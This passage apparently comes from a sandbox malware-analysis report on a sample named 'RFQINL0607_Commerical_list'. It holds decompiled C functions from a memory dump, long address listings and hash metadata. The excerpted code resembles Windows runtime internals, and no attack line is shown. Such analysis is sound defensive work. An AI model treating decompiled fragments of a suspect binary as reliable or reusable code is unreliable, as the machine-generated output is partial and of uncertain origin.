							_t172 = _t238 + 0x66;
							_v92 = 0;
							_v88 = _t172;
							do {
								if( *((char*)(_t172 - 2)) == 0) {
									goto L31;
								}
								_t214 = _v92;
								if(( *_t172 & 0x000000ff) == ( *(_t226 + 0x4e) & 0x7fff)) {
									_t172 = E33396600(1, _t214 + 0x20, 0);
									_t214 = _v44;
									 *(_t214 + 8) = _t172;
									 *((intOrPtr*)(_t214 + 0xc)) = 0;
									L34:
									if(_v40 == 0) {
										goto L9;
									}
									_t202 = _v40;
									_t121 = _t202 + 0x1c; // 0x1c
									_t236 = _t121;
									L33362330(_t172, _t121);
									 *((intOrPtr*)(_t202 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t176 =  *((intOrPtr*)(_t202 + 0x94));
									if( *((intOrPtr*)(_t202 + 0x94)) != 0) {
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t176);
									}
									_t180 = L33365D90(_t214,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
									 *((intOrPtr*)(_t202 + 0x94)) = _t180;
									if(_t180 != 0) {
										 *((intOrPtr*)(_t180 + 8)) = _v20;
										 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)) + 0xc)) = _v16;
										_t220 =  *((intOrPtr*)(_t202 + 0x94));
										 *_t220 = _t220 + 0x10;
										 *((intOrPtr*)(_t220 + 4)) = 0;
										E333988C0( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)))), _v28, _v20);
										_t247 = _t247 + 0xc;
									}
									 *((intOrPtr*)(_t202 + 0x20)) = 0;
									E333624D0(_t236);
									_t210 = _v76;
									_t161 = _v80;
									_t200 = _v84;
									_t234 = _v88;
									L10:
									_t227 =  *((intOrPtr*)(_t238 + 0x1c));
									_v44 = _t227;
									if(_t227 != 0) {
										 *0x334491e0(_v48 + 0x38, _v52, _v63, _t161, _t210, _t234, _t200, _v36,  *((intOrPtr*)(_t238 + 0x20)));
										_v44();
									}
									_pop(_t235);
									_pop(_t243);
									_pop(_t201);
									return E33394B50(0, _t201, _v8 ^ _t247, _t227, _t235, _t243);
								}
								_t172 = _v88;
								L31:
								_t214 = _t214 + 1;
								_t172 = _t172 + 0x18;
								_v92 = _t214;
								_v88 = _t172;
							} while (_t214 < 4);
							goto L34;
						}
					}
					L9:
					_t161 = _v104;
					_t210 = _v100;
					goto L10;
				}
				_t234 = _t233 | 0xffffffff;
				_t200 = _t234;
				_v84 = _t234;
				_v80 = _t200;
				if( *((intOrPtr*)(_t238 + 0x4c)) == _t151) {
					_t222 = _v72;
					_v105 = _v64;
					_t195 = _v76;
				} else {
					_t197 =  *((intOrPtr*)(_t238 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t197) {
						_v63 = _t197;
					}
					_t195 = _v76 |  *(_t238 + 0x40);
					_t222 = _v72 |  *(_t238 + 0x44);
					_t234 =  *(_t238 + 0x38);
					_t200 =  *(_t238 + 0x3c);
					_v76 = _t195;
					_v72 = _t222;
					_v84 = _t234;
					_v80 = _t200;
				}
				_v104 = _t195;
				_v100 = _t222;
				if( *((char*)(_t238 + 0xc4)) != 0) {
					_t226 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t238 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t238 + 0xc5));
						_t226 = _v48;
					}
					_t196 = _t195 |  *(_t238 + 0xb8);
					_t223 = _t222 |  *(_t238 + 0xbc);
					_t234 = _t234 &  *(_t238 + 0xb0);
					_t200 = _t200 &  *(_t238 + 0xb4);
					_v104 = _t196;
					_v76 = _t196;
					_v100 = _t223;
					_v72 = _t223;
					_v84 = _t234;
					_v80 = _t200;
				}
				_t155 = 0;
				if(_v105 == 0) {
					_v52 = 0;
					_t234 = 0;
					_t200 = 0;
					 *((intOrPtr*)(_t226 + 0x74)) = 0;
					goto L19;
				} else {
					_v52 = 1;
					goto L8;
				}
			}
































































                                                                                                                                                                                  0x33351059
                                                                                                                                                                                  0x33351063
                                                                                                                                                                                  0x33351069
                                                                                                                                                                                  0x3335106d
                                                                                                                                                                                  0x3335106f
                                                                                                                                                                                  0x33351076
                                                                                                                                                                                  0x3335107a
                                                                                                                                                                                  0x3335107e
                                                                                                                                                                                  0x33351088
                                                                                                                                                                                  0x33351093
                                                                                                                                                                                  0x33351097
                                                                                                                                                                                  0x3335109b
                                                                                                                                                                                  0x3335109b
                                                                                                                                                                                  0x3335109b
                                                                                                                                                                                  0x3335109d
                                                                                                                                                                                  0x333af1b9
                                                                                                                                                                                  0x333af1bc
                                                                                                                                                                                  0x333af1bf
                                                                                                                                                                                  0x333af1c3
                                                                                                                                                                                  0x333af1c6
                                                                                                                                                                                  0x333af1ca
                                                                                                                                                                                  0x333af1ce
                                                                                                                                                                                  0x333af1d1
                                                                                                                                                                                  0x333af1d5
                                                                                                                                                                                  0x333af1d9
                                                                                                                                                                                  0x333af255
                                                                                                                                                                                  0x333af255
                                                                                                                                                                                  0x333af259
                                                                                                                                                                                  0x33351118
                                                                                                                                                                                  0x3335111c
                                                                                                                                                                                  0x333af262
                                                                                                                                                                                  0x333af262
                                                                                                                                                                                  0x333af268
                                                                                                                                                                                  0x333af26c
                                                                                                                                                                                  0x333af26c
                                                                                                                                                                                  0x333af270
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af27e
                                                                                                                                                                                  0x333af27f
                                                                                                                                                                                  0x333af282
                                                                                                                                                                                  0x333af289
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af28b
                                                                                                                                                                                  0x333af295
                                                                                                                                                                                  0x333af29b
                                                                                                                                                                                  0x333af29f
                                                                                                                                                                                  0x333af2a3
                                                                                                                                                                                  0x333af2a7
                                                                                                                                                                                  0x333af2ab
                                                                                                                                                                                  0x333af2b5
                                                                                                                                                                                  0x333af2c0
                                                                                                                                                                                  0x333af2c4
                                                                                                                                                                                  0x333af2ca
                                                                                                                                                                                  0x333af2d4
                                                                                                                                                                                  0x333af2d8
                                                                                                                                                                                  0x333af2dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af2ed
                                                                                                                                                                                  0x333af2ef
                                                                                                                                                                                  0x333af2f2
                                                                                                                                                                                  0x333af2f5
                                                                                                                                                                                  0x333af2fc
                                                                                                                                                                                  0x333af301
                                                                                                                                                                                  0x333af303
                                                                                                                                                                                  0x333af306
                                                                                                                                                                                  0x333af30a
                                                                                                                                                                                  0x333af30e
                                                                                                                                                                                  0x333af312
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af323
                                                                                                                                                                                  0x333af327
                                                                                                                                                                                  0x333af348
                                                                                                                                                                                  0x333af34d
                                                                                                                                                                                  0x333af351
                                                                                                                                                                                  0x333af354
                                                                                                                                                                                  0x333af357
                                                                                                                                                                                  0x333af35c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af362
                                                                                                                                                                                  0x333af366
                                                                                                                                                                                  0x333af366
                                                                                                                                                                                  0x333af36a
                                                                                                                                                                                  0x333af378
                                                                                                                                                                                  0x333af37b
                                                                                                                                                                                  0x333af383
                                                                                                                                                                                  0x333af392
                                                                                                                                                                                  0x333af392
                                                                                                                                                                                  0x333af3aa
                                                                                                                                                                                  0x333af3af
                                                                                                                                                                                  0x333af3b7
                                                                                                                                                                                  0x333af3bd
                                                                                                                                                                                  0x333af3ca
                                                                                                                                                                                  0x333af3cd
                                                                                                                                                                                  0x333af3d6
                                                                                                                                                                                  0x333af3da
                                                                                                                                                                                  0x333af3ed
                                                                                                                                                                                  0x333af3f2
                                                                                                                                                                                  0x333af3f2
                                                                                                                                                                                  0x333af3f8
                                                                                                                                                                                  0x333af3fb
                                                                                                                                                                                  0x333af400
                                                                                                                                                                                  0x333af404
                                                                                                                                                                                  0x333af408
                                                                                                                                                                                  0x333af40c
                                                                                                                                                                                  0x3335112a
                                                                                                                                                                                  0x3335112a
                                                                                                                                                                                  0x3335112d
                                                                                                                                                                                  0x33351133
                                                                                                                                                                                  0x33351153
                                                                                                                                                                                  0x33351159
                                                                                                                                                                                  0x33351159
                                                                                                                                                                                  0x33351163
                                                                                                                                                                                  0x33351164
                                                                                                                                                                                  0x33351165
                                                                                                                                                                                  0x33351170
                                                                                                                                                                                  0x33351170
                                                                                                                                                                                  0x333af329
                                                                                                                                                                                  0x333af32d
                                                                                                                                                                                  0x333af32d
                                                                                                                                                                                  0x333af32e
                                                                                                                                                                                  0x333af331
                                                                                                                                                                                  0x333af335
                                                                                                                                                                                  0x333af339
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af33e
                                                                                                                                                                                  0x333af2dc
                                                                                                                                                                                  0x33351122
                                                                                                                                                                                  0x33351122
                                                                                                                                                                                  0x33351126
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351126
                                                                                                                                                                                  0x333510a3
                                                                                                                                                                                  0x333510a6
                                                                                                                                                                                  0x333510a8
                                                                                                                                                                                  0x333510ac
                                                                                                                                                                                  0x333510b3
                                                                                                                                                                                  0x333af1e1
                                                                                                                                                                                  0x333af1e5
                                                                                                                                                                                  0x333af1e9
                                                                                                                                                                                  0x333510b9
                                                                                                                                                                                  0x333510b9
                                                                                                                                                                                  0x333510bc
                                                                                                                                                                                  0x333510c5
                                                                                                                                                                                  0x333510c7
                                                                                                                                                                                  0x333510c7
                                                                                                                                                                                  0x333510d3
                                                                                                                                                                                  0x333510d6
                                                                                                                                                                                  0x333510d9
                                                                                                                                                                                  0x333510dc
                                                                                                                                                                                  0x333510df
                                                                                                                                                                                  0x333510e3
                                                                                                                                                                                  0x333510e7
                                                                                                                                                                                  0x333510eb
                                                                                                                                                                                  0x333510eb
                                                                                                                                                                                  0x333510f6
                                                                                                                                                                                  0x333510fa
                                                                                                                                                                                  0x333510fe
                                                                                                                                                                                  0x333af1fc
                                                                                                                                                                                  0x333af200
                                                                                                                                                                                  0x333af205
                                                                                                                                                                                  0x333af20d
                                                                                                                                                                                  0x333af211
                                                                                                                                                                                  0x333af211
                                                                                                                                                                                  0x333af215
                                                                                                                                                                                  0x333af21b
                                                                                                                                                                                  0x333af221
                                                                                                                                                                                  0x333af227
                                                                                                                                                                                  0x333af22d
                                                                                                                                                                                  0x333af231
                                                                                                                                                                                  0x333af235
                                                                                                                                                                                  0x333af239
                                                                                                                                                                                  0x333af23d
                                                                                                                                                                                  0x333af241
                                                                                                                                                                                  0x333af241
                                                                                                                                                                                  0x33351104
                                                                                                                                                                                  0x3335110a
                                                                                                                                                                                  0x333af24a
                                                                                                                                                                                  0x333af24e
                                                                                                                                                                                  0x333af250
                                                                                                                                                                                  0x333af252
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351110
                                                                                                                                                                                  0x33351110
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351110

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: a9e32713695e46475ce7956ca3e2fa27b30a6e34f94356df82f1e8f8d02bb4e8
                                                                                                                                                                                  • Instruction ID: 13a7f169dedccb3398c7bfa5998cd88209b330d0e0e808686bbf8f2004fab4c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9e32713695e46475ce7956ca3e2fa27b30a6e34f94356df82f1e8f8d02bb4e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59B1F2B59093808FE754CF28C880A5AFBE1FF88304F588A6EF89997351D775E945CB42
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33357623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                  			E33357623(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t81;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t113;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t160;

				_t145 = __edx;
				_t138 = __ecx;
				_v32 = __edx;
				_v28 = __ecx;
				if(L33363C40() != 0) {
					_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t69 = 0x7ffe0386;
				}
				if( *_t69 != 0) {
					E33424F7C(((0 | _a4 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t145, _t138);
				}
				goto L3;
				do {
					do {
						L3:
						_t71 =  *0x334467f0; // 0x0
						_t130 =  *0x334467f4; // 0x0
						_v20 = _t71;
						_v8 = _t130;
						_v16 =  *0x7FFE03B4;
						_v12 =  *0x7ffe03b0;
						while(1) {
							_t146 =  *0x7ffe000c;
							_t99 =  *0x7FFE0008;
							if(_t146 ==  *0x7FFE0010) {
								goto L5;
							}
							asm("pause");
						}
						L5:
						_t132 = _v8;
						_t141 = _v16;
						_t74 =  *0x7ffe03b0;
						_t113 =  *((intOrPtr*)(0x7ffe03b4));
						_v24 = _t74;
					} while (_v12 != _t74 || _t141 != _t113);
					_t75 =  *0x334467f0; // 0x0
					_t142 =  *0x334467f4; // 0x0
					_v16 = _t142;
					_t143 = _v20;
				} while (_t143 != _t75 || _t132 != _v16);
				asm("sbb esi, ecx");
				_t101 = _t99 - _v24 - _t143;
				_t144 = _v28;
				asm("sbb esi, edx");
				_t20 = _t144 + 0x90; // 0x90
				L33362330(_t20, _t20);
				 *(_t144 + 0xde) = 0;
				if(( *(_t144 + 0xde) & 0x00000004) != 0) {
					_t60 = _t144 + 0x90; // 0x90
					 *(_t144 + 0xd8) = 0;
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					 *((intOrPtr*)(_t144 + 0xd0)) = 0;
					E333624D0(_t60);
					_t81 = E334249D2( *((intOrPtr*)(_t144 + 0xd0)));
					L20:
					_t82 = _t81 | 0xffffffff;
					asm("lock xadd [edi], eax");
					if(_t82 == 0) {
						 *0x334491e0(_t144);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 4))))))();
					}
					return _t82;
				}
				if( *((intOrPtr*)(_t144 + 0xdd)) != 0) {
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					if(L3338CC67() != 0) {
						goto L18;
					}
					goto L19;
				} else {
					_t133 =  *(_t144 + 0xd8);
					if(_t133 != 0) {
						if(_a4 != 0) {
							_t119 = _t101;
							_v8 = _t146;
						} else {
							_t119 =  *((intOrPtr*)(_t144 + 0xc8));
							_v8 =  *((intOrPtr*)(_t144 + 0xcc));
						}
						_t89 = _t133;
						_t135 = _t89 * 0x2710 >> 0x20;
						_t90 = _t89 * 0x2710;
						_t120 = _t119 + _t90;
						_v12 = _t90;
						_t91 = _v8;
						asm("adc eax, edx");
						_v24 = 0x2710;
						_v28 = _t120;
						_v8 = _t91;
						 *((intOrPtr*)(_t144 + 0xc8)) = _t120;
						 *((intOrPtr*)(_t144 + 0xcc)) = _t91;
						_t160 = _t91 - _t146;
						if(_t160 <= 0 && (_t160 < 0 || _t120 <= _t101)) {
							asm("sbb eax, [ebp-0x4]");
							_t97 = E33396540(_t101 - _v28, _t146, _v12, _t135);
							_t91 = _v24;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t144 + 0xc8)) = _v12 - _t97 + _t101;
							asm("adc eax, esi");
							 *((intOrPtr*)(_t144 + 0xcc)) = _v24;
						}
						asm("lock inc dword [edi]");
						_t102 = _v32;
						L33362330(_t91, _t102);
						_t43 = _t102 + 0x50; // 0x50
						E333579D1(_t43, _t144);
						_t44 = _t102 + 0x50; // 0x50
						E333577F9(_t44, 0);
						E333624D0(_t102);
					}
					L18:
					E33361BE7(_t144);
					L19:
					_t45 = _t144 + 0x90; // 0x90
					_t81 = E333624D0(_t45);
					goto L20;
				}
			}





































                                                                                                                                                                                  0x3335762e
                                                                                                                                                                                  0x33357630
                                                                                                                                                                                  0x33357632
                                                                                                                                                                                  0x33357635
                                                                                                                                                                                  0x3335763f
                                                                                                                                                                                  0x333b171a
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x33357645
                                                                                                                                                                                  0x3335764d
                                                                                                                                                                                  0x333b1737
                                                                                                                                                                                  0x333b1737
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x33357653
                                                                                                                                                                                  0x3335765d
                                                                                                                                                                                  0x33357663
                                                                                                                                                                                  0x33357666
                                                                                                                                                                                  0x33357673
                                                                                                                                                                                  0x33357676
                                                                                                                                                                                  0x3335767f
                                                                                                                                                                                  0x3335767f
                                                                                                                                                                                  0x33357681
                                                                                                                                                                                  0x33357687
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333577f2
                                                                                                                                                                                  0x333577f2
                                                                                                                                                                                  0x3335768d
                                                                                                                                                                                  0x3335768d
                                                                                                                                                                                  0x33357695
                                                                                                                                                                                  0x33357698
                                                                                                                                                                                  0x3335769a
                                                                                                                                                                                  0x3335769d
                                                                                                                                                                                  0x333576a0
                                                                                                                                                                                  0x333576a9
                                                                                                                                                                                  0x333576ae
                                                                                                                                                                                  0x333576b4
                                                                                                                                                                                  0x333576b7
                                                                                                                                                                                  0x333576ba
                                                                                                                                                                                  0x333576c6
                                                                                                                                                                                  0x333576c8
                                                                                                                                                                                  0x333576ca
                                                                                                                                                                                  0x333576cd
                                                                                                                                                                                  0x333576cf
                                                                                                                                                                                  0x333576d6
                                                                                                                                                                                  0x333576e3
                                                                                                                                                                                  0x333576eb
                                                                                                                                                                                  0x333b1747
                                                                                                                                                                                  0x333b174e
                                                                                                                                                                                  0x333b1754
                                                                                                                                                                                  0x333b175a
                                                                                                                                                                                  0x333b1760
                                                                                                                                                                                  0x333b1766
                                                                                                                                                                                  0x333b176d
                                                                                                                                                                                  0x3335778a
                                                                                                                                                                                  0x3335778a
                                                                                                                                                                                  0x3335778d
                                                                                                                                                                                  0x33357791
                                                                                                                                                                                  0x333b177f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b1785
                                                                                                                                                                                  0x3335779b
                                                                                                                                                                                  0x3335779b
                                                                                                                                                                                  0x333576f7
                                                                                                                                                                                  0x333577cf
                                                                                                                                                                                  0x333577d5
                                                                                                                                                                                  0x333577e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333576fd
                                                                                                                                                                                  0x333576fd
                                                                                                                                                                                  0x33357705
                                                                                                                                                                                  0x3335770a
                                                                                                                                                                                  0x333577e8
                                                                                                                                                                                  0x333577ea
                                                                                                                                                                                  0x33357710
                                                                                                                                                                                  0x33357716
                                                                                                                                                                                  0x3335771c
                                                                                                                                                                                  0x3335771c
                                                                                                                                                                                  0x3335771f
                                                                                                                                                                                  0x33357726
                                                                                                                                                                                  0x33357726
                                                                                                                                                                                  0x33357728
                                                                                                                                                                                  0x3335772a
                                                                                                                                                                                  0x3335772d
                                                                                                                                                                                  0x33357730
                                                                                                                                                                                  0x33357732
                                                                                                                                                                                  0x33357735
                                                                                                                                                                                  0x33357738
                                                                                                                                                                                  0x3335773b
                                                                                                                                                                                  0x33357741
                                                                                                                                                                                  0x33357747
                                                                                                                                                                                  0x33357749
                                                                                                                                                                                  0x333577a9
                                                                                                                                                                                  0x333577ae
                                                                                                                                                                                  0x333577b8
                                                                                                                                                                                  0x333577bb
                                                                                                                                                                                  0x333577bf
                                                                                                                                                                                  0x333577c5
                                                                                                                                                                                  0x333577c7
                                                                                                                                                                                  0x333577c7
                                                                                                                                                                                  0x33357751
                                                                                                                                                                                  0x33357754
                                                                                                                                                                                  0x33357758
                                                                                                                                                                                  0x3335775f
                                                                                                                                                                                  0x33357762
                                                                                                                                                                                  0x33357769
                                                                                                                                                                                  0x3335776c
                                                                                                                                                                                  0x33357772
                                                                                                                                                                                  0x33357772
                                                                                                                                                                                  0x33357777
                                                                                                                                                                                  0x33357779
                                                                                                                                                                                  0x3335777e
                                                                                                                                                                                  0x3335777e
                                                                                                                                                                                  0x33357785
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357785

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 78f529807c61bce2bfb62b28b63e62c1f8c3a191994037d63fbb0939dc665380
                                                                                                                                                                                  • Instruction ID: bdebec4e776a71c66df140d1d1128ab86b9bdab7ddd96ed06a962d777b06300f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78f529807c61bce2bfb62b28b63e62c1f8c3a191994037d63fbb0939dc665380
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE613275E05606AFEB08DF68D880EADFBB5BF48344F25C16AF419A7340DB34A9518B90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                                  			E3335254C(void* __ebx, intOrPtr __ecx, signed int __edi, void* __esi, void* __eflags) {
				signed int _v4;
				intOrPtr _v16;
				intOrPtr _v128;
				intOrPtr* _v132;
				char _v180;
				intOrPtr _v184;
				signed int _t41;
				void* _t50;
				void* _t61;
				intOrPtr _t66;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t85;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t92;
				void* _t108;

				_t61 = __ebx;
				_push(0xa8);
				_push(0x3342bbe0);
				L333A7C40(__ebx, __edi, __esi);
				_t89 = __ecx;
				_v184 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					E3338C819(__ebx, __ecx, _t78, __edi, __ecx, __eflags);
					_t66 =  *((intOrPtr*)(__ecx + 8));
					_t82 = __edi | 0xffffffff;
					__eflags = _t82;
					asm("lock xadd [ecx], eax");
					if(_t82 == 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x33446644, _t66);
					}
				} else {
					_t82 = __edi | 0xffffffff;
				}
				if( *((intOrPtr*)(_t89 + 0x38)) != _t82) {
					_push( *((intOrPtr*)(_t89 + 0x38)));
					L20();
				}
				_t39 =  *((intOrPtr*)(_t89 + 0x5c));
				if( *((intOrPtr*)(_t89 + 0x5c)) == 0) {
					L33362330(_t39, 0x33448a30);
					_v4 = 1;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t67 =  *(_t41 + 4);
					__eflags =  *(_t79 + 4) - _t41;
					if( *(_t79 + 4) != _t41) {
						goto L19;
					} else {
						__eflags =  *_t67 - _t41;
						if( *_t67 != _t41) {
							goto L19;
						} else {
							 *_t67 = _t79;
							 *(_t79 + 4) = _t67;
							 *(_t41 + 4) = _t41;
							 *_t41 = _t41;
							_v4 = 0xfffffffe;
							_t50 = L333AFC88();
							goto L10;
						}
					}
				} else {
					L33362330(_t39 + 0x2c, _t39 + 0x2c);
					_v4 = _v4 & 0x00000000;
					_t41 = _t89 + 0x60;
					_t79 =  *_t41;
					_t75 =  *(_t41 + 4);
					if( *(_t79 + 4) != _t41 ||  *_t75 != _t41) {
						L19:
						_t68 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t61);
						_push(_t89);
						_t90 = _v4;
						_push(_t82);
						__eflags = _t90;
						if(_t90 != 0) {
							_t41 = _t90 - 0x00000001 | 0x00000007;
							__eflags = _t41 - 0xffffffff;
							if(_t41 != 0xffffffff) {
								__eflags =  *_t90;
								if( *_t90 > 0) {
									__eflags =  *_t90 - 0x7fffffff;
									if( *_t90 != 0x7fffffff) {
										while(1) {
											_t80 =  *_t90;
											__eflags = _t80 - 0x7fffffff;
											if(_t80 == 0x7fffffff) {
												break;
											}
											_t84 = _t80 - 1;
											_t41 = _t80;
											_t68 = _t84;
											asm("lock cmpxchg [esi], ecx");
											__eflags = _t41 - _t80;
											if(_t41 != _t80) {
												continue;
											}
											L27:
											__eflags =  *0x33446910;
											if( *0x33446910 != 0) {
												asm("lock xadd [esi+0xe8], eax");
												_t41 = E3337C000(_t68, "true", 4, 0xbadc99 + _t90, 0);
											}
											__eflags = _t84;
											if(_t84 == 0) {
												__eflags =  *0x33446911;
												_t69 = _t90;
												if(__eflags != 0) {
													_t41 = E333DDA40(0x7fffffff, _t69, _t84, _t90, __eflags);
												} else {
													_t41 = E333492AF(_t69);
												}
											}
											goto L21;
										}
										_t84 = 0x7fffffff;
										goto L27;
									}
								}
							}
						}
						L21:
						return _t41;
					} else {
						 *_t75 = _t79;
						 *(_t79 + 4) = _t75;
						 *(_t41 + 4) = _t41;
						 *_t41 = _t41;
						_v4 = 0xfffffffe;
						_t50 = E33352688(_t89);
						_t76 =  *((intOrPtr*)(_t89 + 0x5c));
						_t108 = _t76 -  *0x33446890; // 0x2fe07c0
						if(_t108 != 0) {
							__eflags = _t76 -  *0x33446888; // 0x3066da8
							if(__eflags != 0) {
								asm("lock xadd [ecx], edi");
								_t87 = _t82 - 1;
								__eflags = _t82 - 1;
								if(__eflags == 0) {
									_t50 = E3334B705(_t61, _t76, _t87, _t89, __eflags);
								}
							} else {
								_t79 = 0x3344688c;
								_t77 = 0x33446888;
								goto L9;
							}
						} else {
							_t79 = 0x33446894;
							_t77 = 0x33446890;
							L9:
							_t50 = E33352712(_t61, _t77, _t79, _t82, _t89, _t108);
						}
						L10:
						_t85 =  *((intOrPtr*)(_t89 + 0x10));
						if(_t85 != 0) {
							E33398F40( &_v180, 0, 0x98);
							_v132 = _t85;
							_t92 =  *((intOrPtr*)(_t89 + 0x34));
							_v128 = _t92;
							E33356D60( &_v180);
							 *0x334491e0( &_v180, _t92);
							 *_t85();
							_t50 = E333561C3( &_v180, _t79);
						}
						 *[fs:0x0] = _v16;
						return _t50;
					}
				}
			}





























                                                                                                                                                                                  0x3335254c
                                                                                                                                                                                  0x3335254c
                                                                                                                                                                                  0x33352551
                                                                                                                                                                                  0x33352556
                                                                                                                                                                                  0x3335255b
                                                                                                                                                                                  0x3335255d
                                                                                                                                                                                  0x33352567
                                                                                                                                                                                  0x33352645
                                                                                                                                                                                  0x3335264a
                                                                                                                                                                                  0x3335264d
                                                                                                                                                                                  0x3335264d
                                                                                                                                                                                  0x33352652
                                                                                                                                                                                  0x33352656
                                                                                                                                                                                  0x333afc1b
                                                                                                                                                                                  0x333afc1b
                                                                                                                                                                                  0x3335256d
                                                                                                                                                                                  0x3335256d
                                                                                                                                                                                  0x3335256d
                                                                                                                                                                                  0x33352573
                                                                                                                                                                                  0x33352575
                                                                                                                                                                                  0x33352578
                                                                                                                                                                                  0x33352578
                                                                                                                                                                                  0x3335257d
                                                                                                                                                                                  0x33352582
                                                                                                                                                                                  0x333afc42
                                                                                                                                                                                  0x333afc47
                                                                                                                                                                                  0x333afc4e
                                                                                                                                                                                  0x333afc51
                                                                                                                                                                                  0x333afc53
                                                                                                                                                                                  0x333afc56
                                                                                                                                                                                  0x333afc59
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333afc5f
                                                                                                                                                                                  0x333afc5f
